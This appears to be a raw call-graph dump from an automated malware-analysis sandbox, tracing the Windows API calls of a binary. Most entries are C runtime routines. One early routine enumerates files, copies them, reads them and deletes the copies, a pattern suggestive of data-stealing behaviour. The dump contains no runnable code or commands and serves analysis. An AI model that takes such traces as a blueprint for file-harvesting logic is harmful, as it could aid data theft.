6338->6339 6340 22b214b5 lstrlenW 6339->6340 6341 22b214d2 6340->6341 6342 22b214d9 lstrlenW 6340->6342 6341->6325 6343 22b210f1 57 API calls 6342->6343 6344 22b21501 lstrlenW lstrcatW 6343->6344 6345 22b210f1 57 API calls 6344->6345 6346 22b21539 lstrlenW lstrcatW 6345->6346 6347 22b210f1 57 API calls 6346->6347 6348 22b2156b lstrlenW lstrcatW 6347->6348 6349 22b210f1 57 API calls 6348->6349 6350 22b2159d lstrlenW lstrcatW 6349->6350 6351 22b210f1 57 API calls 6350->6351 6351->6341 6353 22b21118 ___scrt_fastfail 6352->6353 6354 22b21129 lstrlenW 6353->6354 6365 22b22c40 6354->6365 6357 22b21177 lstrlenW FindFirstFileW 6359 22b211a0 6357->6359 6360 22b211e1 6357->6360 6358 22b21168 lstrlenW 6358->6357 6361 22b211c7 FindNextFileW 6359->6361 6362 22b211aa 6359->6362 6360->6331 6361->6359 6364 22b211da FindClose 6361->6364 6362->6361 6367 22b21000 6362->6367 6364->6360 6366 22b21148 lstrcatW lstrlenW 6365->6366 6366->6357 6366->6358 6368 22b21022 ___scrt_fastfail 6367->6368 6369 22b210af 6368->6369 6370 22b2102f lstrcatW lstrlenW 6368->6370 6371 22b210b5 lstrlenW 6369->6371 6372 22b210ad 6369->6372 6373 22b2105a lstrlenW 6370->6373 6374 22b2106b lstrlenW 6370->6374 6398 22b21e16 6371->6398 6372->6362 6373->6374 6384 22b21e89 lstrlenW 6374->6384 6377 22b210ca 6377->6372 6380 22b21e89 5 API calls 6377->6380 6378 22b21088 GetFileAttributesW 6378->6372 6379 22b2109c 6378->6379 6379->6372 6390 22b2173a 6379->6390 6382 22b210df 6380->6382 6403 22b211ea 6382->6403 6385 22b22c40 ___scrt_fastfail 6384->6385 6386 22b21ea7 lstrcatW lstrlenW 6385->6386 6387 22b21ec2 6386->6387 6388 22b21ed1 lstrcatW 6386->6388 6387->6388 6389 22b21ec7 lstrlenW 6387->6389 6388->6378 6389->6388 6391 22b21747 ___scrt_fastfail 6390->6391 6418 22b21cca 6391->6418 6395 22b2199f 6395->6372 6396 22b21824 ___scrt_fastfail _strlen 6396->6395 6438 22b215da 6396->6438 6399 22b21e29 6398->6399 6402 22b21e4c 6398->6402 6400 22b21e2d lstrlenW 6399->6400 6399->6402 6401 22b21e3f lstrlenW 6400->6401 6400->6402 
6401->6402 6402->6377 6404 22b2120e ___scrt_fastfail 6403->6404 6405 22b21e89 5 API calls 6404->6405 6406 22b21220 GetFileAttributesW 6405->6406 6407 22b21246 6406->6407 6408 22b21235 6406->6408 6409 22b21e89 5 API calls 6407->6409 6408->6407 6410 22b2173a 35 API calls 6408->6410 6411 22b21258 6409->6411 6410->6407 6412 22b210f1 56 API calls 6411->6412 6413 22b2126d 6412->6413 6414 22b21e89 5 API calls 6413->6414 6415 22b2127f ___scrt_fastfail 6414->6415 6416 22b210f1 56 API calls 6415->6416 6417 22b212e6 6416->6417 6417->6372 6419 22b21cf1 ___scrt_fastfail 6418->6419 6420 22b21d0f CopyFileW CreateFileW 6419->6420 6421 22b21d44 DeleteFileW 6420->6421 6422 22b21d55 GetFileSize 6420->6422 6427 22b21808 6421->6427 6423 22b21ede 22 API calls 6422->6423 6424 22b21d66 ReadFile 6423->6424 6425 22b21d94 CloseHandle DeleteFileW 6424->6425 6426 22b21d7d CloseHandle DeleteFileW 6424->6426 6425->6427 6426->6427 6427->6395 6428 22b21ede 6427->6428 6430 22b2222f 6428->6430 6431 22b2224e 6430->6431 6432 22b2474f __dosmaperr 7 API calls 6430->6432 6434 22b22250 6430->6434 6446 22b247e5 6430->6446 6431->6396 6432->6430 6433 22b22908 6435 22b235d2 __CxxThrowException@8 RaiseException 6433->6435 6434->6433 6453 22b235d2 6434->6453 6436 22b22925 6435->6436 6436->6396 6439 22b2160c _strcat _strlen 6438->6439 6440 22b2163c lstrlenW 6439->6440 6456 22b21c9d 6440->6456 6442 22b21655 lstrcatW lstrlenW 6443 22b21678 6442->6443 6444 22b21693 ___scrt_fastfail 6443->6444 6445 22b2167e lstrcatW 6443->6445 6444->6396 6445->6444 6451 22b256d0 __dosmaperr 6446->6451 6447 22b2570e 6448 22b26368 __dosmaperr 20 API calls 6447->6448 6450 22b2570c 6448->6450 6449 22b256f9 RtlAllocateHeap 6449->6450 6449->6451 6450->6430 6451->6447 6451->6449 6452 22b2474f __dosmaperr 7 API calls 6451->6452 6452->6451 6455 22b235f2 RaiseException 6453->6455 6455->6433 6457 22b21ca6 _strlen 6456->6457 6457->6442 6993 22b22418 6994 22b22420 ___scrt_release_startup_lock 6993->6994 6997 22b247f5 6994->6997 6996 22b22448 
6998 22b24804 6997->6998 6999 22b24808 6997->6999 6998->6996 7002 22b24815 6999->7002 7003 22b25b7a __dosmaperr 20 API calls 7002->7003 7006 22b2482c 7003->7006 7004 22b22ada _ValidateLocalCookies 5 API calls 7005 22b24811 7004->7005 7005->6996 7006->7004 7007 22b2281c 7010 22b22882 7007->7010 7013 22b23550 7010->7013 7012 22b2282a 7014 22b2358a 7013->7014 7015 22b2355d 7013->7015 7014->7012 7015->7014 7015->7015 7016 22b247e5 ___std_exception_copy 21 API calls 7015->7016 7017 22b2357a 7016->7017 7017->7014 7018 22b2544d ___std_exception_copy 26 API calls 7017->7018 7018->7014 7420 22b24bdd 7421 22b24c08 7420->7421 7422 22b24bec 7420->7422 7424 22b26d60 51 API calls 7421->7424 7422->7421 7423 22b24bf2 7422->7423 7425 22b26368 __dosmaperr 20 API calls 7423->7425 7426 22b24c0f GetModuleFileNameA 7424->7426 7427 22b24bf7 7425->7427 7428 22b24c33 7426->7428 7429 22b262ac ___std_exception_copy 26 API calls 7427->7429 7443 22b24d01 7428->7443 7440 22b24c01 7429->7440 7432 22b24e76 20 API calls 7433 22b24c5d 7432->7433 7434 22b24c72 7433->7434 7435 22b24c66 7433->7435 7437 22b24d01 38 API calls 7434->7437 7436 22b26368 __dosmaperr 20 API calls 7435->7436 7438 22b24c6b 7436->7438 7441 22b24c88 7437->7441 7439 22b2571e _free 20 API calls 7438->7439 7439->7440 7441->7438 7442 22b2571e _free 20 API calls 7441->7442 7442->7438 7445 22b24d26 7443->7445 7446 22b24d86 7445->7446 7449 22b270eb 7445->7449 7447 22b24c50 7446->7447 7448 22b270eb 38 API calls 7446->7448 7447->7432 7448->7446 7452 22b27092 7449->7452 7453 22b254a7 __fassign 38 API calls 7452->7453 7454 22b270a6 7453->7454 7454->7445 7558 22b25303 7561 22b250a5 7558->7561 7570 22b2502f 7561->7570 7564 22b2502f 5 API calls 7565 22b250c3 7564->7565 7566 22b25000 20 API calls 7565->7566 7567 22b250ce 7566->7567 7568 22b25000 20 API calls 7567->7568 7569 22b250d9 7568->7569 7571 22b25048 7570->7571 7572 22b22ada _ValidateLocalCookies 5 API calls 7571->7572 7573 22b25069 7572->7573 7573->7564 7574 22b27103 GetCommandLineA 
GetCommandLineW 7632 22b2af43 7633 22b2af59 7632->7633 7634 22b2af4d 7632->7634 7634->7633 7635 22b2af52 CloseHandle 7634->7635 7635->7633 6673 22b27a80 6674 22b27a8d 6673->6674 6675 22b2637b __dosmaperr 20 API calls 6674->6675 6676 22b27aa7 6675->6676 6677 22b2571e _free 20 API calls 6676->6677 6678 22b27ab3 6677->6678 6679 22b2637b __dosmaperr 20 API calls 6678->6679 6682 22b27ad9 6678->6682 6681 22b27acd 6679->6681 6683 22b2571e _free 20 API calls 6681->6683 6684 22b27ae5 6682->6684 6685 22b25eb7 6682->6685 6683->6682 6686 22b25c45 __dosmaperr 5 API calls 6685->6686 6687 22b25ede 6686->6687 6688 22b25efc InitializeCriticalSectionAndSpinCount 6687->6688 6689 22b25ee7 6687->6689 6688->6689 6690 22b22ada _ValidateLocalCookies 5 API calls 6689->6690 6691 22b25f13 6690->6691 6691->6682 7120 22b28640 7123 22b28657 7120->7123 7124 22b28665 7123->7124 7125 22b28679 7123->7125 7126 22b26368 __dosmaperr 20 API calls 7124->7126 7127 22b28693 7125->7127 7128 22b28681 7125->7128 7130 22b2866a 7126->7130 7132 22b254a7 __fassign 38 API calls 7127->7132 7135 22b28652 7127->7135 7129 22b26368 __dosmaperr 20 API calls 7128->7129 7131 22b28686 7129->7131 7133 22b262ac ___std_exception_copy 26 API calls 7130->7133 7134 22b262ac ___std_exception_copy 26 API calls 7131->7134 7132->7135 7133->7135 7134->7135 7455 22b2a1c6 IsProcessorFeaturePresent 7456 22b27bc7 7457 22b27bd3 ___scrt_is_nonwritable_in_current_image 7456->7457 7458 22b27c0a _abort 7457->7458 7464 22b25671 RtlEnterCriticalSection 7457->7464 7460 22b27be7 7461 22b27f86 __fassign 20 API calls 7460->7461 7462 22b27bf7 7461->7462 7465 22b27c10 7462->7465 7464->7460 7468 22b256b9 RtlLeaveCriticalSection 7465->7468 7467 22b27c17 7467->7458 7468->7467 7636 22b2a945 7638 22b2a96d 7636->7638 7637 22b2a9a5 7638->7637 7639 22b2a997 7638->7639 7640 22b2a99e 7638->7640 7642 22b2aa17 21 API calls 7639->7642 7645 22b2aa00 7640->7645 7644 22b2a99c 7642->7644 7646 22b2aa20 7645->7646 7647 22b2b19b __startOneArgErrorHandling 21 API calls 
7646->7647 7648 22b2a9a3 7647->7648 6692 22b2508a 6693 22b250a2 6692->6693 6694 22b2509c 6692->6694 6696 22b25000 6694->6696 6697 22b2502a 6696->6697 6698 22b2500d 6696->6698 6697->6693 6699 22b25024 6698->6699 6700 22b2571e _free 20 API calls 6698->6700 6701 22b2571e _free 20 API calls 6699->6701 6700->6698 6701->6697 7649 22b25348 7650 22b23529 ___vcrt_uninitialize 8 API calls 7649->7650 7651 22b2534f 7650->7651 7652 22b27b48 7662 22b28ebf 7652->7662 7656 22b27b55 7675 22b2907c 7656->7675 7659 22b27b7f 7660 22b2571e _free 20 API calls 7659->7660 7661 22b27b8a 7660->7661 7679 22b28ec8 7662->7679 7664 22b27b50 7665 22b28fdc 7664->7665 7666 22b28fe8 ___scrt_is_nonwritable_in_current_image 7665->7666 7699 22b25671 RtlEnterCriticalSection 7666->7699 7668 22b28ff3 7669 22b2905e 7668->7669 7671 22b29032 RtlDeleteCriticalSection 7668->7671 7700 22b2a09c 7668->7700 7713 22b29073 7669->7713 7674 22b2571e _free 20 API calls 7671->7674 7672 22b2906a _abort 7672->7656 7674->7668 7676 22b29092 7675->7676 7677 22b27b64 RtlDeleteCriticalSection 7675->7677 7676->7677 7678 22b2571e _free 20 API calls 7676->7678 7677->7656 7677->7659 7678->7677 7680 22b28ed4 ___scrt_is_nonwritable_in_current_image 7679->7680 7689 22b25671 RtlEnterCriticalSection 7680->7689 7682 22b28f77 7694 22b28f97 7682->7694 7683 22b28ee3 7683->7682 7688 22b28e78 66 API calls 7683->7688 7690 22b27b94 RtlEnterCriticalSection 7683->7690 7691 22b28f6d 7683->7691 7686 22b28f83 _abort 7686->7664 7688->7683 7689->7683 7690->7683 7697 22b27ba8 RtlLeaveCriticalSection 7691->7697 7693 22b28f75 7693->7683 7698 22b256b9 RtlLeaveCriticalSection 7694->7698 7696 22b28f9e 7696->7686 7697->7693 7698->7696 7699->7668 7701 22b2a0a8 ___scrt_is_nonwritable_in_current_image 7700->7701 7702 22b2a0b9 7701->7702 7703 22b2a0ce 7701->7703 7704 22b26368 __dosmaperr 20 API calls 7702->7704 7712 22b2a0c9 _abort 7703->7712 7716 22b27b94 RtlEnterCriticalSection 7703->7716 7705 22b2a0be 7704->7705 7707 22b262ac ___std_exception_copy 26 API 
calls 7705->7707 7707->7712 7708 22b2a0ea 7717 22b2a026 7708->7717 7710 22b2a0f5 7733 22b2a112 7710->7733 7712->7668 7981 22b256b9 RtlLeaveCriticalSection 7713->7981 7715 22b2907a 7715->7672 7716->7708 7718 22b2a033 7717->7718 7719 22b2a048 7717->7719 7720 22b26368 __dosmaperr 20 API calls 7718->7720 7725 22b2a043 7719->7725 7736 22b28e12 7719->7736 7721 22b2a038 7720->7721 7723 22b262ac ___std_exception_copy 26 API calls 7721->7723 7723->7725 7725->7710 7726 22b2907c 20 API calls 7727 22b2a064 7726->7727 7742 22b27a5a 7727->7742 7729 22b2a06a 7749 22b2adce 7729->7749 7732 22b2571e _free 20 API calls 7732->7725 7980 22b27ba8 RtlLeaveCriticalSection 7733->7980 7735 22b2a11a 7735->7712 7737 22b28e2a 7736->7737 7741 22b28e26 7736->7741 7738 22b27a5a 26 API calls 7737->7738 7737->7741 7739 22b28e4a 7738->7739 7764 22b29a22 7739->7764 7741->7726 7743 22b27a66 7742->7743 7744 22b27a7b 7742->7744 7745 22b26368 __dosmaperr 20 API calls 7743->7745 7744->7729 7746 22b27a6b 7745->7746 7747 22b262ac ___std_exception_copy 26 API calls 7746->7747 7748 22b27a76 7747->7748 7748->7729 7750 22b2adf2 7749->7750 7751 22b2addd 7749->7751 7753 22b2ae2d 7750->7753 7758 22b2ae19 7750->7758 7752 22b26355 __dosmaperr 20 API calls 7751->7752 7755 22b2ade2 7752->7755 7754 22b26355 __dosmaperr 20 API calls 7753->7754 7756 22b2ae32 7754->7756 7757 22b26368 __dosmaperr 20 API calls 7755->7757 7759 22b26368 __dosmaperr 20 API calls 7756->7759 7760 22b2a070 7757->7760 7937 22b2ada6 7758->7937 7762 22b2ae3a 7759->7762 7760->7725 7760->7732 7763 22b262ac ___std_exception_copy 26 API calls 7762->7763 7763->7760 7765 22b29a2e ___scrt_is_nonwritable_in_current_image 7764->7765 7766 22b29a36 7765->7766 7767 22b29a4e 7765->7767 7789 22b26355 7766->7789 7769 22b29aec 7767->7769 7773 22b29a83 7767->7773 7771 22b26355 __dosmaperr 20 API calls 7769->7771 7774 22b29af1 7771->7774 7772 22b26368 __dosmaperr 20 API calls 7782 22b29a43 _abort 7772->7782 7792 22b28c7b RtlEnterCriticalSection 7773->7792 7776 
22b26368 __dosmaperr 20 API calls 7774->7776 7778 22b29af9 7776->7778 7777 22b29a89 7779 22b29aa5 7777->7779 7780 22b29aba 7777->7780 7781 22b262ac ___std_exception_copy 26 API calls 7778->7781 7784 22b26368 __dosmaperr 20 API calls 7779->7784 7793 22b29b0d 7780->7793 7781->7782 7782->7741 7786 22b29aaa 7784->7786 7785 22b29ab5 7844 22b29ae4 7785->7844 7787 22b26355 __dosmaperr 20 API calls 7786->7787 7787->7785 7790 22b25b7a __dosmaperr 20 API calls 7789->7790 7791 22b2635a 7790->7791 7791->7772 7792->7777 7794 22b29b34 7793->7794 7795 22b29b3b 7793->7795 7799 22b22ada _ValidateLocalCookies 5 API calls 7794->7799 7796 22b29b5e 7795->7796 7797 22b29b3f 7795->7797 7801 22b29baf 7796->7801 7802 22b29b92 7796->7802 7798 22b26355 __dosmaperr 20 API calls 7797->7798 7800 22b29b44 7798->7800 7803 22b29d15 7799->7803 7804 22b26368 __dosmaperr 20 API calls 7800->7804 7805 22b29bc5 7801->7805 7847 22b2a00b 7801->7847 7806 22b26355 __dosmaperr 20 API calls 7802->7806 7803->7785 7808 22b29b4b 7804->7808 7850 22b296b2 7805->7850 7807 22b29b97 7806->7807 7811 22b26368 __dosmaperr 20 API calls 7807->7811 7812 22b262ac ___std_exception_copy 26 API calls 7808->7812 7814 22b29b9f 7811->7814 7812->7794 7817 22b262ac ___std_exception_copy 26 API calls 7814->7817 7815 22b29bd3 7820 22b29bd7 7815->7820 7821 22b29bf9 7815->7821 7816 22b29c0c 7818 22b29c20 7816->7818 7819 22b29c66 WriteFile 7816->7819 7817->7794 7824 22b29c56 7818->7824 7825 22b29c28 7818->7825 7822 22b29c89 GetLastError 7819->7822 7832 22b29bef 7819->7832 7828 22b29ccd 7820->7828 7857 22b29645 7820->7857 7862 22b29492 GetConsoleCP 7821->7862 7822->7832 7888 22b29728 7824->7888 7829 22b29c46 7825->7829 7830 22b29c2d 7825->7830 7828->7794 7831 22b26368 __dosmaperr 20 API calls 7828->7831 7880 22b298f5 7829->7880 7830->7828 7873 22b29807 7830->7873 7834 22b29cf2 7831->7834 7832->7794 7832->7828 7835 22b29ca9 7832->7835 7837 22b26355 __dosmaperr 20 API calls 7834->7837 7838 22b29cb0 7835->7838 7839 22b29cc4 7835->7839 
7837->7794 7840 22b26368 __dosmaperr 20 API calls 7838->7840 7895 22b26332 7839->7895 7842 22b29cb5 7840->7842 7843 22b26355 __dosmaperr 20 API calls 7842->7843 7843->7794 7936 22b28c9e RtlLeaveCriticalSection 7844->7936 7846 22b29aea 7846->7782 7900 22b29f8d 7847->7900 7922 22b28dbc 7850->7922 7852 22b296c2 7853 22b296c7 7852->7853 7854 22b25af6 _abort 38 API calls 7852->7854 7853->7815 7853->7816 7855 22b296ea 7854->7855 7855->7853 7856 22b29708 GetConsoleMode 7855->7856 7856->7853 7860 22b2969f 7857->7860 7861 22b2966a 7857->7861 7858 22b2a181 WriteConsoleW CreateFileW 7858->7861 7859 22b296a1 GetLastError 7859->7860 7860->7832 7861->7858 7861->7859 7861->7860 7863 22b294f5 7862->7863 7867 22b29607 7862->7867 7863->7867 7868 22b2957b WideCharToMultiByte 7863->7868 7870 22b279e6 40 API calls __fassign 7863->7870 7872 22b295d2 WriteFile 7863->7872 7931 22b27c19 7863->7931 7864 22b22ada _ValidateLocalCookies 5 API calls 7866 22b29641 7864->7866 7866->7832 7867->7864 7868->7867 7869 22b295a1 WriteFile 7868->7869 7869->7863 7871 22b2962a GetLastError 7869->7871 7870->7863 7871->7867 7872->7863 7872->7871 7878 22b29816 7873->7878 7874 22b298d8 7875 22b22ada _ValidateLocalCookies 5 API calls 7874->7875 7877 22b298f1 7875->7877 7876 22b29894 WriteFile 7876->7878 7879 22b298da GetLastError 7876->7879 7877->7832 7878->7874 7878->7876 7879->7874 7885 22b29904 7880->7885 7881 22b29a0f 7882 22b22ada _ValidateLocalCookies 5 API calls 7881->7882 7883 22b29a1e 7882->7883 7883->7832 7884 22b29986 WideCharToMultiByte 7886 22b29a07 GetLastError 7884->7886 7887 22b299bb WriteFile 7884->7887 7885->7881 7885->7884 7885->7887 7886->7881 7887->7885 7887->7886 7889 22b29737 7888->7889 7890 22b297ea 7889->7890 7892 22b297a9 WriteFile 7889->7892 7891 22b22ada _ValidateLocalCookies 5 API calls 7890->7891 7894 22b29803 7891->7894 7892->7889 7893 22b297ec GetLastError 7892->7893 7893->7890 7894->7832 7896 22b26355 __dosmaperr 20 API calls 7895->7896 7897 22b2633d __dosmaperr 7896->7897 7898 
22b26368 __dosmaperr 20 API calls 7897->7898 7899 22b26350 7898->7899 7899->7794 7909 22b28d52 7900->7909 7902 22b29f9f 7903 22b29fa7 7902->7903 7904 22b29fb8 SetFilePointerEx 7902->7904 7905 22b26368 __dosmaperr 20 API calls 7903->7905 7906 22b29fd0 GetLastError 7904->7906 7907 22b29fac 7904->7907 7905->7907 7908 22b26332 __dosmaperr 20 API calls 7906->7908 7907->7805 7908->7907 7910 22b28d5f 7909->7910 7912 22b28d74 7909->7912 7911 22b26355 __dosmaperr 20 API calls 7910->7911 7914 22b28d64 7911->7914 7913 22b26355 __dosmaperr 20 API calls 7912->7913 7915 22b28d99 7912->7915 7916 22b28da4 7913->7916 7917 22b26368 __dosmaperr 20 API calls 7914->7917 7915->7902 7918 22b26368 __dosmaperr 20 API calls 7916->7918 7919 22b28d6c 7917->7919 7920 22b28dac 7918->7920 7919->7902 7921 22b262ac ___std_exception_copy 26 API calls 7920->7921 7921->7919 7923 22b28dd6 7922->7923 7924 22b28dc9 7922->7924 7926 22b28de2 7923->7926 7927 22b26368 __dosmaperr 20 API calls 7923->7927 7925 22b26368 __dosmaperr 20 API calls 7924->7925 7928 22b28dce 7925->7928 7926->7852 7929 22b28e03 7927->7929 7928->7852 7930 22b262ac ___std_exception_copy 26 API calls 7929->7930 7930->7928 7932 22b25af6 _abort 38 API calls 7931->7932 7933 22b27c24 7932->7933 7934 22b27a00 __fassign 38 API calls 7933->7934 7935 22b27c34 7934->7935 7935->7863 7936->7846 7940 22b2ad24 7937->7940 7939 22b2adca 7939->7760 7941 22b2ad30 ___scrt_is_nonwritable_in_current_image 7940->7941 7951 22b28c7b RtlEnterCriticalSection 7941->7951 7943 22b2ad3e 7944 22b2ad70 7943->7944 7945 22b2ad65 7943->7945 7947 22b26368 __dosmaperr 20 API calls 7944->7947 7952 22b2ae4d 7945->7952 7948 22b2ad6b 7947->7948 7967 22b2ad9a 7948->7967 7950 22b2ad8d _abort 7950->7939 7951->7943 7953 22b28d52 26 API calls 7952->7953 7954 22b2ae5d 7953->7954 7955 22b2ae63 7954->7955 7956 22b2ae95 7954->7956 7958 22b28d52 26 API calls 7954->7958 7970 22b28cc1 7955->7970 7956->7955 7959 22b28d52 26 API calls 7956->7959 7961 22b2ae8c 7958->7961 7962 22b2aea1 
CloseHandle 7959->7962 7964 22b28d52 26 API calls 7961->7964 7962->7955 7965 22b2aead GetLastError 7962->7965 7963 22b2aedd 7963->7948 7964->7956 7965->7955 7966 22b26332 __dosmaperr 20 API calls 7966->7963 7979 22b28c9e RtlLeaveCriticalSection 7967->7979 7969 22b2ada4 7969->7950 7971 22b28cd0 7970->7971 7972 22b28d37 7970->7972 7971->7972 7978 22b28cfa 7971->7978 7973 22b26368 __dosmaperr 20 API calls 7972->7973 7974 22b28d3c 7973->7974 7975 22b26355 __dosmaperr 20 API calls 7974->7975 7976 22b28d27 7975->7976 7976->7963 7976->7966 7977 22b28d21 SetStdHandle 7977->7976 7978->7976 7978->7977 7979->7969 7980->7735 7981->7715 6702 22b28a89 6705 22b26d60 6702->6705 6706 22b26d72 6705->6706 6707 22b26d69 6705->6707 6709 22b26c5f 6707->6709 6710 22b25af6 _abort 38 API calls 6709->6710 6711 22b26c6c 6710->6711 6729 22b26d7e 6711->6729 6713 22b26c74 6738 22b269f3 6713->6738 6716 22b26c8b 6716->6706 6719 22b26cce 6722 22b2571e _free 20 API calls 6719->6722 6722->6716 6723 22b26cc9 6724 22b26368 __dosmaperr 20 API calls 6723->6724 6724->6719 6725 22b26d12 6725->6719 6762 22b268c9 6725->6762 6726 22b26ce6 6726->6725 6727 22b2571e _free 20 API calls 6726->6727 6727->6725 6730 22b26d8a ___scrt_is_nonwritable_in_current_image 6729->6730 6731 22b25af6 _abort 38 API calls 6730->6731 6736 22b26d94 6731->6736 6733 22b26e18 _abort 6733->6713 6735 22b255a8 _abort 38 API calls 6735->6736 6736->6733 6736->6735 6737 22b2571e _free 20 API calls 6736->6737 6765 22b25671 RtlEnterCriticalSection 6736->6765 6766 22b26e0f 6736->6766 6737->6736 6770 22b254a7 6738->6770 6741 22b26a26 6743 22b26a3d 6741->6743 6744 22b26a2b GetACP 6741->6744 6742 22b26a14 GetOEMCP 6742->6743 6743->6716 6745 22b256d0 6743->6745 6744->6743 6746 22b2570e 6745->6746 6750 22b256de __dosmaperr 6745->6750 6747 22b26368 __dosmaperr 20 API calls 6746->6747 6749 22b2570c 6747->6749 6748 22b256f9 RtlAllocateHeap 6748->6749 6748->6750 6749->6719 6752 22b26e20 6749->6752 6750->6746 6750->6748 6751 22b2474f __dosmaperr 7 API 
calls 6750->6751 6751->6750 6753 22b269f3 40 API calls 6752->6753 6754 22b26e3f 6753->6754 6756 22b26e90 IsValidCodePage 6754->6756 6759 22b26e46 6754->6759 6760 22b26eb5 ___scrt_fastfail 6754->6760 6755 22b22ada _ValidateLocalCookies 5 API calls 6757 22b26cc1 6755->6757 6758 22b26ea2 GetCPInfo 6756->6758 6756->6759 6757->6723 6757->6726 6758->6759 6758->6760 6759->6755 6807 22b26acb GetCPInfo 6760->6807 6880 22b26886 6762->6880 6764 22b268ed 6764->6719 6765->6736 6769 22b256b9 RtlLeaveCriticalSection 6766->6769 6768 22b26e16 6768->6736 6769->6768 6771 22b254ba 6770->6771 6772 22b254c4 6770->6772 6771->6741 6771->6742 6772->6771 6773 22b25af6 _abort 38 API calls 6772->6773 6774 22b254e5 6773->6774 6778 22b27a00 6774->6778 6779 22b27a13 6778->6779 6780 22b254fe 6778->6780 6779->6780 6786 22b27f0f 6779->6786 6782 22b27a2d 6780->6782 6783 22b27a40 6782->6783 6785 22b27a55 6782->6785 6784 22b26d7e __fassign 38 API calls 6783->6784 6783->6785 6784->6785 6785->6771 6787 22b27f1b ___scrt_is_nonwritable_in_current_image 6786->6787 6788 22b25af6 _abort 38 API calls 6787->6788 6789 22b27f24 6788->6789 6790 22b27f72 _abort 6789->6790 6798 22b25671 RtlEnterCriticalSection 6789->6798 6790->6780 6792 22b27f42 6799 22b27f86 6792->6799 6797 22b255a8 _abort 38 API calls 6797->6790 6798->6792 6800 22b27f56 6799->6800 6801 22b27f94 __fassign 6799->6801 6803 22b27f75 6800->6803 6801->6800 6802 22b27cc2 __fassign 20 API calls 6801->6802 6802->6800 6806 22b256b9 RtlLeaveCriticalSection 6803->6806 6805 22b27f69 6805->6790 6805->6797 6806->6805 6813 22b26b05 6807->6813 6816 22b26baf 6807->6816 6810 22b22ada _ValidateLocalCookies 5 API calls 6812 22b26c5b 6810->6812 6812->6759 6817 22b286e4 6813->6817 6815 22b28a3e 43 API calls 6815->6816 6816->6810 6818 22b254a7 __fassign 38 API calls 6817->6818 6820 22b28704 MultiByteToWideChar 6818->6820 6821 22b28742 6820->6821 6822 22b287da 6820->6822 6824 22b256d0 21 API calls 6821->6824 6827 22b28763 ___scrt_fastfail 6821->6827 6823 22b22ada 
_ValidateLocalCookies 5 API calls 6822->6823 6825 22b26b66 6823->6825 6824->6827 6831 22b28a3e 6825->6831 6826 22b287d4 6836 22b28801 6826->6836 6827->6826 6829 22b287a8 MultiByteToWideChar 6827->6829 6829->6826 6830 22b287c4 GetStringTypeW 6829->6830 6830->6826 6832 22b254a7 __fassign 38 API calls 6831->6832 6833 22b28a51 6832->6833 6840 22b28821 6833->6840 6837 22b2881e 6836->6837 6838 22b2880d 6836->6838 6837->6822 6838->6837 6839 22b2571e _free 20 API calls 6838->6839 6839->6837 6841 22b2883c 6840->6841 6842 22b28862 MultiByteToWideChar 6841->6842 6843 22b28a16 6842->6843 6844 22b2888c 6842->6844 6845 22b22ada _ValidateLocalCookies 5 API calls 6843->6845 6847 22b256d0 21 API calls 6844->6847 6850 22b288ad 6844->6850 6846 22b26b87 6845->6846 6846->6815 6847->6850 6848 22b288f6 MultiByteToWideChar 6849 22b28962 6848->6849 6851 22b2890f 6848->6851 6853 22b28801 __freea 20 API calls 6849->6853 6850->6848 6850->6849 6867 22b25f19 6851->6867 6853->6843 6855 22b28971 6857 22b256d0 21 API calls 6855->6857 6862 22b28992 6855->6862 6856 22b28939 6856->6849 6859 22b25f19 11 API calls 6856->6859 6857->6862 6858 22b28a07 6861 22b28801 __freea 20 API calls 6858->6861 6859->6849 6860 22b25f19 11 API calls 6863 22b289e6 6860->6863 6861->6849 6862->6858 6862->6860 6863->6858 6864 22b289f5 WideCharToMultiByte 6863->6864 6864->6858 6865 22b28a35 6864->6865 6866 22b28801 __freea 20 API calls 6865->6866 6866->6849 6868 22b25c45 __dosmaperr 5 API calls 6867->6868 6869 22b25f40 6868->6869 6873 22b25f49 6869->6873 6875 22b25fa1 6869->6875 6872 22b22ada _ValidateLocalCookies 5 API calls 6874 22b25f9b 6872->6874 6873->6872 6874->6849 6874->6855 6874->6856 6876 22b25c45 __dosmaperr 5 API calls 6875->6876 6877 22b25fc8 6876->6877 6878 22b22ada _ValidateLocalCookies 5 API calls 6877->6878 6879 22b25f89 LCMapStringW 6878->6879 6879->6873 6881 22b26892 ___scrt_is_nonwritable_in_current_image 6880->6881 6888 22b25671 RtlEnterCriticalSection 6881->6888 6883 22b2689c 6889 22b268f1 6883->6889 
6887 22b268b5 _abort 6887->6764 6888->6883 6901 22b27011 6889->6901 6891 22b2693f 6892 22b27011 26 API calls 6891->6892 6893 22b2695b 6892->6893 6894 22b27011 26 API calls 6893->6894 6895 22b26979 6894->6895 6896 22b268a9 6895->6896 6897 22b2571e _free 20 API calls 6895->6897 6898 22b268bd 6896->6898 6897->6896 6915 22b256b9 RtlLeaveCriticalSection 6898->6915 6900 22b268c7 6900->6887 6902 22b27022 6901->6902 6906 22b2701e 6901->6906 6903 22b27029 6902->6903 6907 22b2703c ___scrt_fastfail 6902->6907 6904 22b26368 __dosmaperr 20 API calls 6903->6904 6905 22b2702e 6904->6905 6908 22b262ac ___std_exception_copy 26 API calls 6905->6908 6906->6891 6907->6906 6909 22b2706a 6907->6909 6911 22b27073 6907->6911 6908->6906 6910 22b26368 __dosmaperr 20 API calls 6909->6910 6912 22b2706f 6910->6912 6911->6906 6913 22b26368 __dosmaperr 20 API calls 6911->6913 6914 22b262ac ___std_exception_copy 26 API calls 6912->6914 6913->6912 6914->6906 6915->6900 7136 22b22049 7138 22b22055 ___scrt_is_nonwritable_in_current_image 7136->7138 7137 22b2205e 7138->7137 7139 22b220d3 7138->7139 7140 22b2207d 7138->7140 7171 22b22639 IsProcessorFeaturePresent 7139->7171 7150 22b2244c 7140->7150 7143 22b220da 7144 22b22082 7159 22b22308 7144->7159 7146 22b22087 __RTC_Initialize 7162 22b220c4 7146->7162 7148 22b2209f 7165 22b2260b 7148->7165 7151 22b22451 ___scrt_release_startup_lock 7150->7151 7152 22b22455 7151->7152 7155 22b22461 7151->7155 7153 22b2527a _abort 20 API calls 7152->7153 7154 22b2245f 7153->7154 7154->7144 7156 22b2246e 7155->7156 7157 22b2499b _abort 28 API calls 7155->7157 7156->7144 7158 22b24bbd 7157->7158 7158->7144 7175 22b234c7 RtlInterlockedFlushSList 7159->7175 7161 22b22312 7161->7146 7177 22b2246f 7162->7177 7164 22b220c9 ___scrt_release_startup_lock 7164->7148 7166 22b22617 7165->7166 7170 22b2262d 7166->7170 7205 22b253ed 7166->7205 7170->7137 7172 22b2264e ___scrt_fastfail 7171->7172 7173 22b226f9 